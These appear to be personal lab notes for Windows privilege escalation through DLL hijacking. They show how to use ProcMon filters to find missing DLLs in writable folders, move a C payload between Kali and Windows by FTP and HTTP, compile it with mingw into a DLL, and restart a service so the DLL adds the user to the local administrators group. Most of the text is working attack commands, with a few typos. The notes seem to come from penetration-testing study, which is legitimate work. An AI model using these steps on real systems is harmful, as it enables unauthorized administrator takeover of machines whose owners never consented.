Check using ProcMon!
In ProMon, use a filter:
RESULT - IS - NAME NOT FOUND - INCLUDEClick add
and
Path - ends with - .dll - Includeclick add
apply + ok
We find one that is in a writable place (most common is Program Files)
In this case we have Temp folder writable
We find this:
We can hijack the dll in either Program Files (potentially) or Temp (what we did)
To change things up:
FTP on Kali to receive the DLL in tmp:
cd /tmp
python3 -m pyftbdlib -p 21 --writeOn Windows, where the DLL is open a CMD and:
ftp 10.6.62.12
anonymous
anonymous
put windows_dll.cOn Kali in tmp:
mousepad windows_dll.cEdit the whoami command to make your user an admin:
Change user to whatever your actual user name is.
system("cmd.exe /k net localgroup administrators user /add");exit editor and make the DLL:
x86_64-w64-mingw32-gcc windows_dll.c -shared -o hijackme.dllMove the DLL to Windows:
python3 -m http.server 80Save the dll in the Temp folder (or Program Files; where you found read + write priv and name not found)
stop and start the dllsvc to simulate it working
sc stop dllsvc
sc start dllsvc
#You can combine these two like:
sc stop dllsvc & sc start dllsvccheck that user is admin:
net localgroup administrators